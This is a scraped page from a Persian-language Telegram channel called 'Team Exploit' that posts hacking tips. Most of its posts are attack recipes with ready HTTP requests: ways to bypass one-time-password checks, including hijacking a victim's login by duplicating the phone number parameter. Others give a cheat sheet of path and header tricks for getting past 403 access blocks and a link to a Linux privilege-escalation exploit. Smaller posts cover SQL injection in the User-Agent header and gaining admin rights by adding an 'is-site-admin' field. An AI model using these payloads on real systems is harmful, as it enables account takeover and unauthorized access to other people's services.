Team Exploit
1.83K subscribers
192 photos
28 videos
86 files
126 links
Download Telegram
نات کویین و کص کویین فلان کویین فقط یه بازیه که باهاش تعداد ادم های بیکار جهانو در بیارن
حالا هی با کله بکوب تو گوشیت!
در ظاهر یه عکس یا لوگو موزه و یه چیزِ سادست...
🔥1
Hide-info.py
3.6 KB
یه تیکه کد برای اینکه بتونید اطلاعاتی که میخواید مخفی بمونه رو داخل عکس یا موزیک مخفی کنید! یکم قدیمیه و من اینو ۲ سال پیش نوشته بودم، گفتم بزارم شاید بدردتون بخوره

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
کاری که بعضیا با ابزار های من کردن و درامد داشتن برای خودم قفله:|
🔖تکنیک های بای پس OTP

1️⃣. دستکاری کد وضعیت اگر کد وضعیت 4xx باشد سعی کنید آن را به 200 OK تغییر دهید و ببینید آیا محدودیت ها را دور می زند

2️⃣. سعی کنید در قسمت OTP Empty OTP یا Set NULL ارسال کنید که otp=null برای دور زدن است
 POST /secondLogin HTTP/1.1
Host: company.com
Content-Type: application/json
Content-Length: Number
{"email":"me","pass":"**","otp":""}
3️⃣. سعی کنید صفر را در پارامتر OTP که 000000 است وارد کنید تا OTP را دور بزنید.
POST /secondLogin HTTP/1.1
Host: company.com
Origin: company.com
Content-Length: Number
{"email":"me","pass":"**","otp":"000000"}
4️⃣. اگر درخواست در JSON باشد درخواست OTP
 {"phone_no":"victim_no"، "phone_no":"attacker_no"} 
مهاجم OTP-Login را با شماره مهاجم دریافت خواهد کرد
 {"phone_no":"viktima_no", "phone_no":"attacker_no"،"otp":"1234"} 
و ما به عنوان VICTIM وارد سیستم می شویم


5️⃣. اگر درخواست در JSON است از آرایه پر از OTPهای تأیید ایمیل استفاده کنید تا از بین آنها فقط یک OTP معتبر باشد.

6️⃣. درخواست otp در هر دو دستگاه مهاجم و قربانی را به طور همزمان امتحان کنید، این می تواند توسط نفوذگر آروغ زدن انجام شود اگر OTP یکسان است، پس یک دور زدن otp آسان است.

7️⃣. بازسازی بی نهایت OTP اگر بتوانید یک OTP جدید را بی نهایت بار تولید کنید، OTP به اندازه کافی ساده است (4 عدد)، و می توانید تا 4 یا 5 توکن در هر OTP تولید شده را امتحان کنید، فقط می توانید هر بار همان 4 یا 5 توکن را امتحان کنید و OTP تولید کنید تا زمانی که با آنهایی که استفاده می کنید مطابقت دارد.


┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
هشدار بهره برداری: CVE-2024-1086 (تشدید امتیاز محلی) 🚨

در میان هرج و مرج بکدور xz، این اکسپلویت مخفیانه ظاهر شد!

🔥 روی هسته های لینوکس 5.14 تا 6.6 کار می کند.

CVE: https://github.com/Notselwyn/CVE-2024-1086

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
بای پس 403 (Forbidden)

1. با استفاده از هدر "X-Original-URL"

GET /admin HTTP/1.1
Host: target.com
مثال

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

2. اضافه کردن %2e بعد از اولین اسلش

target.com/admin => 403
مثال
target.com/%2e/admin => 200
3. نقطه (.) اسلش (/) و نقطه ویرگول (;) را در URL اضافه کنید

target.com/admin => 403
مثال
target.com/secret/. => 200
target.com//secret// => 200
target.com/./secret/.. => 200
target.com/;/secret => 200
target.com/.;/secret => 200
target.com//;//secret => 200
بعد از نام دایرکتوری "..;/" را اضافه کنید

target.com/admin
مثال
target.com/admin..;/
5. سعی کنید حروف الفبا را در آدرس اینترنتی بزرگ بنویسید

target.com/admin
مثال
target.com/aDmIN
6. از طریق Web Cache Poisoning

GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin
ابزاری برای این کار ها:

https://github.com/daffainfo/bypass-403

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
کپی برداری از مطالب مشکلی نداره
اما حداقل از ظاهر ایدی چنل اسکی نرید:|
انقدر که دنبال اینی تاپ گوگول بشی بشین درستو بخون

آیا می دانید که اسلش های رو به جلو ("/") درون تگ های html به طور خودکار توسط مرورگرها به فاصله ("") تبدیل می شوند؟

به عنوان مثال:

<a/b='c'/d='e'/f='g'>X</a> 
به طور خودکار به تبدیل خواهد شد به:

<a b='c' d='e' f='g'>X</a>
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
موقع فاز کردن یه سایت وردپرسی "/_wpeprivate/config.json" را به لیست فازینگ خود اضافه کنید.

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
یک روز دیگر، #SQLInjection دیگر. این بار، در هدر User-Agent قرار دارد که منجر به کنترل کامل پایگاه داده می شود. به آزمایش SQLi روی همه چیز و همه جا ادامه دهید...(Time Based)

#Tips

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
یه سم پیدا کردم
Team Exploit
یه سم پیدا کردم
من فقط یک ویژگی اضافی

"is-site-admin":true

اضافه کردم، و یکی از مدیران سایت شدم:/


#Tips
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
اطلاعات حاجیارو هم که زدن💩